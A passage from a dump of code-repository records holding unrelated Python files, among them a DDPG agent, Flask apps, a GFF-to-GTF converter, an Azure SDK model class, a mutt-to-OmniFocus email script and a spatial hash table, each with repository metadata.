p1_y = coord_y - CIRCLE_RADIO*math.sin((alpha+30)*3.14/180)
p2_x = coord_x + CIRCLE_RADIO*math.cos((alpha-30)*3.14/180)
p2_y = coord_y - CIRCLE_RADIO*math.sin((alpha-30)*3.14/180)
p3_x = coord_x + 2*CIRCLE_RADIO*math.cos((alpha)*3.14/180)
p3_y = coord_y - 2*CIRCLE_RADIO*math.sin((alpha)*3.14/180)
pts = np.array([[p1_x, p1_y],[p2_x,p2_y],[p3_x,p3_y]], np.int32)
pts = pts.reshape((-1,1,2))
cv2.fillPoly(self.map,[pts],(255,0,0))
def showMap(self):
while(True):
cv2.imshow("mapa", self.map)
if cv2.waitKey(100) & 0xFF == ord('q'):
break
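# Usage sketch, added for illustration: the pose and marker values below are made up, and
# the data/esquema.png and data/drone.png assets loaded in __init__ must exist for it to run.
if __name__ == '__main__':
    view = MapView()
    # state vector: drone x (cm), y (cm), heading (deg), then x, y, angle for each marker
    view.updateMap([[60], [30], [90], [100], [40], [0]])
    view.showMap()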
|
[
"[email protected]"
] | |
19414b707e9497314917d44fc6119c2108d592fe
|
833f76620c02f4a02a19b3a2e13b0de6b947a28a
|
/agent.py
|
cb3a86f7f5228415e5fae3aa84580b222a4b80d4
|
[] |
no_license
|
dszokolics/deepRL-continuous-control
|
0bf9af540b1cd4211da5f018a8f57fb7b6dcf0aa
|
6dfcb247fa792bcd794bf481a1cea1cb84f3a073
|
refs/heads/master
| 2023-04-27T17:18:34.014978 | 2021-05-16T10:24:16 | 2021-05-16T10:24:16 | 367,846,375 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,626 |
py
|
import numpy as np
import random
import copy
from collections import namedtuple, deque
import torch
import torch.nn.functional as F
import torch.optim as optim
from model import Actor, Critic
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Agent():
"""Interacts with and learns from the environment."""
def __init__(self, state_size, action_size, random_seed, num_agents, agent_params):
"""Initialize an Agent object.
Based on https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
Params
======
state_size (int): dimension of each state
action_size (int): dimension of each action
random_seed (int): random seed
"""
self.state_size = state_size
self.action_size = action_size
self.seed = random.seed(random_seed)
self.params = agent_params
# Actor Network (w/ Target Network)
self.actor_local = Actor(state_size, action_size, random_seed).to(device)
self.actor_target = Actor(state_size, action_size, random_seed).to(device)
self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=self.params["lr_actor"])
# Critic Network (w/ Target Network)
self.critic_local = Critic(state_size, action_size, random_seed).to(device)
self.critic_target = Critic(state_size, action_size, random_seed).to(device)
self.critic_optimizer = optim.Adam(
self.critic_local.parameters(), lr=self.params["lr_critic"], weight_decay=self.params["weight_decay"]
)
# Noise process
self.noise = OUNoise(action_size, random_seed, num_agents)
# Replay memory
self.memory = ReplayBuffer(action_size, self.params["buffer_size"], self.params["batch_size"], random_seed)
self.steps_since_last_update = 0
def step(self, state, action, reward, next_state, done):
"""Save experience in replay memory, and use random sample from buffer to learn."""
# Save experience / reward
self.memory.add(state, action, reward, next_state, done)
self.steps_since_last_update += 1
# Learn, if enough samples are available in memory
if len(self.memory) > self.params["batch_size"]:
            if self.steps_since_last_update % self.params["update_every"] == 0:  # learn once every update_every steps
for _ in range(self.params["update_batch_number"]):
experiences = self.memory.sample()
self.learn(experiences, self.params["gamma"])
def act(self, state, add_noise=True):
"""Returns actions for given state as per current policy."""
state = torch.from_numpy(state).float().to(device)
self.actor_local.eval()
with torch.no_grad():
action = self.actor_local(state).cpu().data.numpy()
self.actor_local.train()
if add_noise:
action += self.noise.sample()
return np.clip(action, -1, 1)
def reset(self):
self.noise.reset()
def learn(self, experiences, gamma):
"""Update policy and value parameters using given batch of experience tuples.
Q_targets = r + γ * critic_target(next_state, actor_target(next_state))
where:
actor_target(state) -> action
critic_target(state, action) -> Q-value
Params
======
experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
gamma (float): discount factor
"""
states, actions, rewards, next_states, dones = experiences
# ---------------------------- update critic ---------------------------- #
# Get predicted next-state actions and Q values from target models
actions_next = self.actor_target(next_states)
Q_targets_next = self.critic_target(next_states, actions_next)
# Compute Q targets for current states (y_i)
Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
# Compute critic loss
Q_expected = self.critic_local(states, actions)
critic_loss = F.mse_loss(Q_expected, Q_targets)
# Minimize the loss
self.critic_optimizer.zero_grad()
critic_loss.backward()
torch.nn.utils.clip_grad_norm_(self.critic_local.parameters(), 1)
self.critic_optimizer.step()
# ---------------------------- update actor ---------------------------- #
# Compute actor loss
actions_pred = self.actor_local(states)
actor_loss = -self.critic_local(states, actions_pred).mean()
# Minimize the loss
self.actor_optimizer.zero_grad()
actor_loss.backward()
torch.nn.utils.clip_grad_norm_(self.critic_local.parameters(), 1)
self.actor_optimizer.step()
# ----------------------- update target networks ----------------------- #
self.soft_update(self.critic_local, self.critic_target, self.params["tau"])
self.soft_update(self.actor_local, self.actor_target, self.params["tau"])
def soft_update(self, local_model, target_model, tau):
"""Soft update model parameters.
θ_target = τ*θ_local + (1 - τ)*θ_target
Params
======
local_model: PyTorch model (weights will be copied from)
target_model: PyTorch model (weights will be copied to)
tau (float): interpolation parameter
"""
for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)
class OUNoise:
"""Ornstein-Uhlenbeck process.
https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
"""
def __init__(self, action_size, seed, num_agents, mu=0., theta=0.2, sigma=0.25):
"""Initialize parameters and noise process."""
self.mu = mu * np.ones((num_agents, action_size))
self.theta = theta
self.sigma = sigma
self.seed = random.seed(seed)
self.reset()
def reset(self):
"""Reset the internal state (=noise) to mean (mu)."""
self.state = copy.copy(self.mu)
def sample(self):
"""Update internal state and return it as a noise sample"""
x = self.state
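        # mean-reverting step: drift toward mu at rate theta, plus scaled Gaussian exploration noise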
dx = self.theta * (self.mu - x) + self.sigma * (np.random.standard_normal(size=x.shape))
self.state = x + dx
return self.state
class ReplayBuffer:
"""Fixed-size buffer to store experience tuples."""
def __init__(self, action_size, buffer_size, batch_size, seed):
"""Initialize a ReplayBuffer object.
https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
Params
======
buffer_size (int): maximum size of buffer
batch_size (int): size of each training batch
"""
self.action_size = action_size
self.memory = deque(maxlen=buffer_size) # internal memory (deque)
self.batch_size = batch_size
self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
self.seed = random.seed(seed)
def add(self, state, action, reward, next_state, done):
"""Add a new experience to memory."""
for s, a, r, s_next, d in zip(state, action, reward, next_state, done):
e = self.experience(s, a, r, s_next, d)
self.memory.append(e)
def sample(self):
"""Randomly sample a batch of experiences from memory."""
experiences = random.sample(self.memory, k=self.batch_size)
states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device)
actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).float().to(device)
rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device)
next_states = (
torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(device)
)
dones = (
torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8))
.float().to(device)
)
return (states, actions, rewards, next_states, dones)
def __len__(self):
"""Return the current size of internal memory."""
return len(self.memory)
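# Usage sketch, added for illustration: the hyperparameter values are made up, and the
# Actor/Critic networks imported from model.py must be available for this to run.
if __name__ == "__main__":
    params = {"lr_actor": 1e-4, "lr_critic": 1e-3, "weight_decay": 0.0,
              "buffer_size": int(1e5), "batch_size": 128, "gamma": 0.99,
              "tau": 1e-3, "update_every": 20, "update_batch_number": 10}
    agent = Agent(state_size=33, action_size=4, random_seed=0, num_agents=20, agent_params=params)
    dummy_states = np.zeros((20, 33), dtype=np.float32)
    actions = agent.act(dummy_states)  # one clipped action vector per agent
    print(actions.shape)  # (20, 4)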
|
[
"[email protected]"
] | |
128d2a94962ecb1a54b4c9c3ca840004e656b188
|
9e241ae22cafe7ed4aaba2f06632420a63ec44fd
|
/Project 142/main.py
|
c30ed130f6ed02a9f977b69ffb0d69621d3dc3a8
|
[] |
no_license
|
Whitehat-Lataksh/Article-Recommending
|
b970f4d916733667aca20f85321710c1b40def62
|
ece145cc7b86288750339b38c319fd15e5490450
|
refs/heads/main
| 2023-08-11T20:23:14.510692 | 2021-09-17T04:55:17 | 2021-09-17T04:55:17 | 407,406,604 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,367 |
py
|
from flask import Flask, jsonify, request
from storage import all_articles, liked_articles, not_liked_articles
from demographic_filtering import output
from content_filtering import get_recommendations
app = Flask(__name__)
@app.route("/get-article")
def get_article():
movie_data = {
"url": all_articles[0][11],
"title": all_articles[0][12],
"text": all_articles[0][13],
"lang": all_articles[0][14],
"total_events": all_articles[0][15]
}
return jsonify({
"data": movie_data,
"status": "success"
})
@app.route("/liked-article", methods=["POST"])
def liked_article():
article = all_articles[0]
liked_articles.append(article)
all_articles.pop(0)
return jsonify({
"status": "success"
}), 201
@app.route("/unliked-article", methods=["POST"])
def unliked_article():
article = all_articles[0]
not_liked_articles.append(article)
all_articles.pop(0)
return jsonify({
"status": "success"
}), 201
@app.route("/popular-articles")
def popular_articles():
article_data = []
for article in output:
_d = {
"url": article[0],
"title": article[1],
"text": article[2],
"lang": article[3],
"total_events": article[4]
}
article_data.append(_d)
return jsonify({
"data": article_data,
"status": "success"
}), 200
@app.route("/recommended-articles")
def recommended_articles():
all_recommended = []
for liked_article in liked_articles:
output = get_recommendations(liked_article[4])
for data in output:
all_recommended.append(data)
import itertools
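    # sorting then itertools.groupby drops duplicate recommendations produced for more than one liked article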
all_recommended.sort()
all_recommended = list(all_recommended for all_recommended,_ in itertools.groupby(all_recommended))
article_data = []
for recommended in all_recommended:
_d = {
"url": recommended[0],
"title": recommended[1],
"text": recommended[2],
"lang": recommended[3],
"total_events": recommended[4]
}
article_data.append(_d)
return jsonify({
"data": article_data,
"status": "success"
}), 200
if __name__ == "__main__":
app.run()
|
[
"[email protected]"
] | |
6ab95716a6bff065c2b13765723aee7964f0a87a
|
ef25f5fe6b74e2c84dd299de2e23c3487f9b0746
|
/python_exc/gff_to_gtf.py
|
8b9f067f870b1ab50db3376e17259da74df17ba1
|
[] |
no_license
|
feifei/python
|
32da1cb18ce19a05a62fc334ba4aab902b2cd0af
|
f0eaa69d5ca011e3075f9af56ef3aa756178e5e3
|
refs/heads/main
| 2023-05-30T19:14:06.132356 | 2021-06-04T13:45:03 | 2021-06-04T13:45:03 | 342,535,711 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,515 |
py
|
#!/usr/bin/env python
''' Convert GFF3 file to GTF,
only tested on EupathDB output, which is not a standard GFF3 file
'''
import os, re
import argparse
parser = argparse.ArgumentParser(description='Convert gff3 file to gtf file')
parser.add_argument('gff_file')
args = parser.parse_args()
gff_file = args.gff_file
basename, extension = os.path.splitext(gff_file)
gtf_file = basename + ".gtf"
with open (gff_file, 'r') as inh, open(gtf_file, 'w') as outh:
for line in inh:
if line.startswith("#"):
continue
scfid, source, feature, start, end, score, strand, frame, attr = line.split("\t")
if feature == "gene":
gene_id = re.match("ID=(.*?);", attr).group(1)
new_attr = "gene_id \"%s\";" %gene_id
transcript_id = gene_id + "_t"
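            # illustrative: an attribute string such as 'ID=gene0001;...' yields
            # gene_id "gene0001" and transcript_id "gene0001_t"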
elif feature == "exon":
exon_id = re.match("ID=(.*?);", attr).group(1)
exon_number = re.search("-(\d+)$", exon_id).group(1)
new_attr = "gene_id \"%s\"; transcript_id \"%s\"; exon_number \"%s\"; exon_id \"%s\";" %(gene_id, transcript_id, exon_number, exon_id)
else:
continue
print >>outh, "\t".join([scfid, source, feature, start, end, score, strand, frame, new_attr])
if feature == "gene":
new_attr = "gene_id \"%s\"; transcript_id \"%s\";" %(gene_id, transcript_id)
print >>outh, "\t".join([scfid, source, "transcript", start, end, score, strand, frame, new_attr])
|
[
"[email protected]"
] | |
516e00001cc17c4e8ab48673154d9f69351bbfe1
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_run_request.py
|
2f2ed7a707c8b543f090be7f386215b7b75e10ce
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 |
MIT
| 2020-10-02T01:17:02 | 2019-05-22T07:33:46 |
Python
|
UTF-8
|
Python
| false | false | 1,824 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .run_request import RunRequest
class TaskRunRequest(RunRequest):
"""The parameters for a task run request.
All required parameters must be populated in order to send to Azure.
:param is_archive_enabled: The value that indicates whether archiving is
enabled for the run or not. Default value: False .
:type is_archive_enabled: bool
:param type: Required. Constant filled by server.
:type type: str
:param task_name: Required. The name of task against which run has to be
queued.
:type task_name: str
:param values: The collection of overridable values that can be passed
when running a task.
:type values:
list[~azure.mgmt.containerregistry.v2018_09_01.models.SetValue]
"""
_validation = {
'type': {'required': True},
'task_name': {'required': True},
}
_attribute_map = {
'is_archive_enabled': {'key': 'isArchiveEnabled', 'type': 'bool'},
'type': {'key': 'type', 'type': 'str'},
'task_name': {'key': 'taskName', 'type': 'str'},
'values': {'key': 'values', 'type': '[SetValue]'},
}
def __init__(self, **kwargs):
super(TaskRunRequest, self).__init__(**kwargs)
self.task_name = kwargs.get('task_name', None)
self.values = kwargs.get('values', None)
self.type = 'TaskRunRequest'
|
[
"[email protected]"
] | |
c403719d00c3664c1b2cb6adf47318a985282c01
|
f54a87aa1196cbe9ac56dfab44295201444edeaf
|
/130818_FlaskTweets/ex.py
|
784dc936880419c67a4f50eee2b2e00e78ddae36
|
[] |
no_license
|
pythonflaskstudy2013/Weekly--Python-
|
66d291a1b48d3d7618235e1e141e1f1e40908ce2
|
5bf1416f10df3daa119d15f87c5cbb346ab6e81c
|
refs/heads/master
| 2020-03-27T01:11:07.148567 | 2013-09-01T04:13:46 | 2013-09-01T04:13:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,130 |
py
|
#!/usr/bin/env python
from flask import Flask
from flask import render_template, render_template_string, request
import math
app = Flask(__name__)
books = ['Programming in Scala', 'Mining the Social Web', 'Pattern-Oriented Software Architecture']
@app.route('/inherit')
def inherit():
return render_template('child.html')
@app.route('/books')
def list():
return render_template('books.html', books=books)
@app.route('/animals')
def animals():
return render_template('animals.html', animals=[
'cat', 'dog', 'pig', 'cow', 'sheep', 'panda', 'bear'
])
@app.route('/macro')
def forms():
return render_template('macro.html')
@app.route('/filter')
def filter():
return render_template('filter.html')
@app.route('/custom')
def custom():
return render_template('custom.html')
@app.template_filter()
def reverse(text):
return text[::-1]
@app.template_test()
def is_prime(n):
if n == 2:
return True
for i in range(2, int(math.ceil(math.sqrt(n))) + 1):
if n % i == 0:
return False
return True
@app.template_global()
def whoami():
return 'My Name is Daegeun'
app.run(debug=True)
|
[
"[email protected]"
] | |
3bd778d2775c1fc9582037bb95bba1c5063b9273
|
5414512230d3fb1b6ba70d9f1eabb2bfaae6f337
|
/List_Array.py
|
702a09f18efc8a9dfd700bebedcdb4e42f672300
|
[] |
no_license
|
offenanil/dunder_method
|
950968d7eae9cf3d5714130f34997824a1e9b473
|
6956774f0aa06b7722431fce0dfebef595c01c97
|
refs/heads/main
| 2023-07-03T12:25:19.200499 | 2021-08-06T02:12:20 | 2021-08-06T02:12:20 | 392,276,739 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 399 |
py
|
# name = "Anil"
# age = 28
# phone = 984123
# address = 'Sydney'
# print(name,'', age,'',phone,'',address)
users = ['ram', 'sita', 'gita', 'hari']
# indexing starts at 0 from the left; negative indexing starts at -1 from the right, so the last element is index -1
print(users)
# to print only 'gita', the syntax is:
print(users[2])
print(users[-2])
# both lines above print the same element
|
[
"[email protected]"
] | |
00fe1a578edc91b4d4734fcc27e0575cc817ea1f
|
eef7c5e1ece154796b8c0b8a772cc172de1cba50
|
/hashTable.py
|
546a9c50e5c09441eff558180435dd68053d849b
|
[] |
no_license
|
NILOIDE/Coordinate_HashTable
|
957fdc2091daad47b39e591910ce880b7bd7f16c
|
5e761eefac10cec875b167df1903cd07129899d3
|
refs/heads/master
| 2020-06-15T23:28:31.299003 | 2019-07-05T14:37:58 | 2019-07-05T14:37:58 | 195,420,941 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,801 |
py
|
import numpy as np
class SpatialHashTable(object):
"""
Hash table used to split coordinate system into buckets. Objects can be assigned to all buckets
that overlap with the provided volume. A hash table is useful in cases where it becomes
inefficient to search through all items in the coordinate system. Assigning objects to buckets
allows for a selected retrieval of neighboring objects.
Written by: Nil Stolt Ansó, 05/07/2019
"""
def __init__(self, dims, bucket_size):
self.dims = dims
self.n_dims = dims.shape[0]
self.buckets_per_dim = np.ceil(dims / bucket_size).astype(np.int32)
self.bucket_size = bucket_size # Assuming buckets have equally sized sides
self.n_buckets = int(np.prod(self.buckets_per_dim))
self.buckets = {}
self.clear_buckets()
def get_nearby_objects(self, pos, radius):
"""
Given a position and radius, retrieve all objects in the overlapping buckets.
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return: Objects in buckets overlapping with given volume.
"""
cell_ids = self.get_ids_for_volume(pos, radius)
return self.get_objects_from_buckets(cell_ids)
def get_ids_for_volume(self, pos, radius):
"""
Retrieve the IDs of all buckets overlapping with the volume with the given center position
and given radius.
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return: IDs of buckets overlapping volume.
"""
ids = set()
lowest_pos = np.max((pos - radius, np.zeros((self.n_dims,))), axis=0)
lowest_bucket_lower_bound = (lowest_pos - lowest_pos % self.bucket_size).astype(np.int32)
highest_bucket_upper_bound = (np.min((self.dims, pos + radius + 1.0), axis=0)).astype(np.int32)
for x in range(lowest_bucket_lower_bound[0], highest_bucket_upper_bound[0], self.bucket_size):
for y in range(lowest_bucket_lower_bound[1], highest_bucket_upper_bound[1], self.bucket_size):
for z in range(lowest_bucket_lower_bound[2], highest_bucket_upper_bound[2], self.bucket_size):
ids.add(self.get_id(x, y, z))
return ids
def get_id(self, x, y, z):
"""
Get bucket ID containing the given Cartesian coordinate.
:param x:
:param y:
:param z:
:return:
"""
return x // self.bucket_size + y // self.bucket_size * self.buckets_per_dim[0] + \
z // self.bucket_size * self.buckets_per_dim[0] * self.buckets_per_dim[1]
def get_objects_from_buckets(self, ids):
"""
Given the IDs of buckets, return the union of every set obtained from each individual bucket.
:param ids: Indices of buckets.
:return: Union of objects found in those buckets.
"""
objects = set()
for i in ids:
objects = objects.union(self.buckets[i])
return objects
def clear_buckets(self):
"""
Remove all objects from all buckets in the hash table.
:return:
"""
for idx in range(self.n_buckets):
self.buckets[idx] = set()
def insert_object(self, obj, pos, radius):
"""
Insert an object into all buckets that overlap with the volume with center 'pos' and
radius 'radius'
:param obj: Object to be inserted into buckets
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return:
"""
idxs = self.get_ids_for_volume(pos, radius)
for idx in idxs:
self.buckets[idx].add(obj)
def insert_objects(self, object_structure):
"""
Insert a structure of objects into hash table.
:param object_structure: Data structure where each row is of form (object, position, radius)
:return:
"""
for (obj, pos, radius) in object_structure:
self.insert_object(obj, pos, radius)
def get_dims(self):
"""
Get dimensions of hash table in terms of the coordinate system.
:return:
"""
return self.dims
def get_buckets_per_dim(self):
"""
Get how many buckets lay in each dimension.
:return: Tuple of number of buckets per dimension
"""
return self.buckets_per_dim
def get_buckets(self):
"""
Get all buckets.
:return:
"""
return self.buckets
def get_bucket_content(self, i):
"""
Get all objects in bucket of the given ID.
:param i: ID of the bucket
:return: Objects in the bucket with given ID.
"""
return self.buckets[i]
def get_bucket_center(self, i):
"""
Get the center coordinate (in terms of coordinate system) of bucket with given ID.
:param i: Index of bucket.
:return: Center coordinate of bucket.
"""
center = np.empty((self.n_dims,))
center[0] = i % self.dims[0] * self.bucket_size + self.bucket_size / 2
for d in range(1, self.n_dims):
center[d] = i // np.prod(self.dims[:d]) * self.bucket_size + self.bucket_size / 2
return center
def remove_object(self, obj, pos, radius):
"""
Remove object from all buckets overlapping with volume with center 'pos' and
radius 'radius'.
:param obj: Object to be inserted into buckets
:param pos: Center of search volume.
:param radius: Radius of search volume.
:return:
"""
idxs = self.get_ids_for_volume(pos, radius)
for idx in idxs:
self.buckets[idx].remove(obj)
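# --- Illustrative usage sketch (not from the original module); dimensions,
# --- positions, and radii below are assumed values.
if __name__ == '__main__':
    table = SpatialHashTable(dims=np.array([100.0, 100.0, 100.0]), bucket_size=10)
    table.insert_object('ball', pos=np.array([12.0, 47.0, 33.0]), radius=2.0)
    # Everything whose buckets overlap a sphere around the query point.
    print(table.get_nearby_objects(np.array([15.0, 45.0, 30.0]), radius=5.0))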
|
[
"[email protected]"
] | |
5b98146395ad29c6511925bbc47a3402f1251fa2
|
1e168ced1a4bdb53967021e082b98027aea9d38a
|
/1.알고리즘정리/정렬/삽입정렬.py
|
6e0f94afc79ed7d33b51a468d14c6182e85e3d68
|
[] |
no_license
|
vvspearlvvs/CodingTest
|
3ebf921308570ac11eb87e6660048ccfcaf90ce4
|
fc61b71d955f73ef8710f792d008bc671614ef7a
|
refs/heads/main
| 2023-07-13T15:57:11.312519 | 2021-08-25T02:15:28 | 2021-08-25T02:15:28 | 354,232,513 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 282 |
py
|
# insertion sort
arr = [7, 5, 9, 0, 3, 1, 6, 2, 4, 8]
for i in range(len(arr)):
for j in range(i,0,-1):
        if arr[j]<arr[j-1]:  # shift one position to the left
arr[j],arr[j-1]=arr[j-1],arr[j]
else:
break
print(arr)
print("최종")
print(arr)
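# --- A reusable function-style sketch of the same algorithm (the name
# --- insertion_sort is my own, not from the original file).
def insertion_sort(seq):
    for i in range(1, len(seq)):
        j = i
        # Shift seq[j] left until the prefix seq[:i + 1] is sorted.
        while j > 0 and seq[j] < seq[j - 1]:
            seq[j], seq[j - 1] = seq[j - 1], seq[j]
            j -= 1
    return seq

print(insertion_sort([7, 5, 9, 0, 3, 1, 6, 2, 4, 8]))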
|
[
"[email protected]"
] | |
7c7062d3cb3ee5ceef84ad4f204bfa6737215dd7
|
15ae6eb98806ae70ac49b0a0214fab4c3d15e073
|
/数据科学基础/数据科学基础(/st_python/2017期末考试/大一班/ExhaustEmission.py
|
92ba2236c8a3e611613b64664a043bdf10b7d459
|
[] |
no_license
|
huyuework/professional-class
|
b423c42d401d9731f498e1c7fd0da2ebc819ba68
|
e1717c32370b7cc9d82ca7c098e57104b04af9c6
|
refs/heads/master
| 2023-08-21T21:38:32.333392 | 2021-10-06T07:56:08 | 2021-10-06T07:56:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,239 |
py
|
# -*- coding:utf-8 -*-
'''
log api example: log('output is: ' + str(output))
'''
from scipy.stats import t as T
from scipy.stats import f
import numpy as np
class Solution():
def solve(self):
t_2010 = ['6.0', '17.3', '104.3', '101.0', '120.4', '91.9', '30.0', '41.9', '23.9', '101.2',
'67.7', '48.7', '39.9', '49.0', '136.6', '117.6', '52.7', '64.9', '101.3', '83.5', '2.1',
'58.6', '94.6', '62.4', '41.8', '0.2', '74.2', '40.1', '12.7', '27.8', '51.5']
t_2014 = ['52041', '207793', '176469', '88880', '96190', '130672', '57246', '65987', '172867', '110665',
'82021', '41483', '76043', '40756', '81118', '106123', '96222', '21173', '65589', '33045', '1798',
'494415', '52040', '70603', '102842', '930', '69103', '72148', '71839', '92369', '74216']
d = []
for i in range(len(t_2010)):
d.append(float(t_2014[i]) - float(t_2010[i]) * 10000)
# print d
meanD = np.average(d)
Sd = np.std(d, ddof=1)
n = len(d)
t = meanD / (Sd / np.sqrt(n))
if t > T.isf(0.05, n - 1):
return [t, 'YES']
else:
return [t, 'NO']
so = Solution()
print so.solve()
|
[
"[email protected]"
] | |
26e5e03a43169c15a3fd647c4f0679d97ffa81ca
|
d80c7fe8288acfd02fa79e240183c418e522d1aa
|
/1-Basics/Test/Q3/Test.py
|
fe3ac9d72f23225da1bc1dff45214d3059d66be5
|
[] |
no_license
|
4ratkm88/COM404
|
82beeb84e7f6713a666038311e0d3e86d94ecc2e
|
5bf81d520ec44e19d15e2ee333c81542316c7833
|
refs/heads/master
| 2020-07-31T09:15:00.658014 | 2019-12-10T11:09:09 | 2019-12-10T11:09:09 | 210,556,814 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 166 |
py
|
print("How many zones must I cross?")
zone=int(input())
for zone in range(zone, 0, -1):
print("…crossed zone "+ str(zone))
print("Crossed all zones. Jumanji!")
|
[
"[email protected]"
] | |
4278e7b7f4ccb1865e1fc8e2c19350fb3bfb8177
|
2556d0bed5e90489ec8c93ad033db00b235e3de0
|
/main.py
|
e5979e99101b749dfa72a25e15f20ec0069e877e
|
[] |
no_license
|
weichih654/movie_review
|
dd08392d029c3d7614178e5c49e97b6c973f659b
|
47fabf41262318568bd7dbcafb34e0acb531b674
|
refs/heads/master
| 2021-01-10T02:14:22.864684 | 2016-03-21T11:01:23 | 2016-03-21T11:01:23 | 49,113,499 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 362 |
py
|
from libs.movie_review import MovieReview
from libs.review_searcher import ReviewSeacher
from libs.matcher import Matcher
if __name__ == "__main__":
searcher = ReviewSeacher("test")
reviews = []
reviews = searcher.reviews
for r in reviews:
review = MovieReview(r)
print "link = " + r
print "content = " + review.content
|
[
"[email protected]"
] | |
bcb16b3b56244d6ba5fc6daf20ec87ed4180b1ca
|
256afbb25a57bdc54b2c3e3e3fc7832c31c8467f
|
/mutt-to-omnifocus.py
|
224765e49122746dd7328bb35dbb13f24b8b17d3
|
[] |
no_license
|
jeauxlb/mutt-to-omnifocus
|
a3b3ba29ff83220c1ce5f52ba351d44e6bad3ac7
|
5d19b109057eeaad1c600c4e0d5dccc952a03546
|
refs/heads/master
| 2021-01-19T08:26:52.169184 | 2019-11-03T13:02:26 | 2019-11-03T13:02:26 | 87,630,521 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,832 |
py
|
#!/usr/bin/env python
import sys
import os
import getopt
import email.parser
import subprocess
from email.header import decode_header
def usage():
print """
Take an RFC-compliant e-mail message on STDIN and add a
corresponding task to the OmniFocus inbox for it.
Options:
-h, --help
Display this help text.
-q, --quick-entry
Use the quick entry panel instead of directly creating a task.
"""
def applescript_escape(string):
"""Applescript requires backslashes and double quotes to be escaped in
string. This returns the escaped string.
"""
if string is not None:
# Backslashes first (else you end up escaping your escapes)
string = string.replace('\\', '\\\\')
# Then double quotes
string = string.replace('"', '\\"')
return string
def parse_message(raw):
"""Parse a string containing an e-mail and produce a list containing the
significant headers. Each element is a tuple containing the name and
content of the header (list of tuples rather than dictionary to preserve
order).
"""
# Create a Message object
message = email.parser.Parser().parsestr(raw, headersonly=True)
# Extract relevant headers
list = [("Date", message.get("Date")),
("From", message.get("From")),
# ("Subject", message.get("Subject")),
("Message-ID", message.get("Message-ID"))]
try:
sub, encoding = decode_header(message.get("Subject"))[0]
sub = sub.replace('\n', '');
pipe = subprocess.Popen(['/Users/joel/bin/item_name.sh', sub], stdout=subprocess.PIPE)
subject, error = pipe.communicate()
list.append(["Subject", subject.rstrip('\n')])
except KeyboardInterrupt:
print ""
sys.exit()
return list
def send_to_omnifocus(params, quickentry=False):
"""Take the list of significant headers and create an OmniFocus inbox item
from these.
"""
# name and note of the task (escaped as per applescript_escape())
name = "%s" % applescript_escape(dict(params)["Subject"])
note = "\n".join(["%s: %s" % (k, applescript_escape(v)) for (k, v) in params])
# Write the Applescript
if quickentry:
applescript = """
tell application "OmniFocus"
tell default document
tell quick entry
open
make new inbox task with properties {name: "%s", note:"%s"}
select tree 1
set note expanded of tree 1 to true
end tell
end tell
end tell
""" % (name, note)
else:
applescript = """
tell application "OmniFocus"
tell default document
make new inbox task with properties {name: "%s", note:"%s"}
end tell
end tell
""" % (name, note)
# Use osascript and a heredoc to run this Applescript
os.system("\n".join(["osascript >/dev/null << EOT", applescript, "EOT"]))
def main():
# Check for options
try:
opts, args = getopt.getopt(sys.argv[1:], "hq", ["help", "quick-entry"])
except getopt.GetoptError:
usage()
sys.exit(-1)
# If an option was specified, do the right thing
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit(0)
elif opt in ("-q", "--quick-entry"):
raw = sys.stdin.read()
send_to_omnifocus(parse_message(raw), quickentry=True)
sys.exit(0)
# Otherwise fall back to standard operation
raw = sys.stdin.read()
send_to_omnifocus(parse_message(raw), quickentry=False)
sys.exit(0)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
9592e0575d2287aeb96b002e0a67d11474e08684
|
b83e9ded5aa46bf7c79a6cbce8a239a4ca0b38ba
|
/tests/utils_test.py
|
d4794967907dc4fe9f079e14a39ef5e15d4c4884
|
[
"Apache-2.0"
] |
permissive
|
pnickl/neural-tangents
|
55cb2800dc8067fff5024e995fbe953070f41905
|
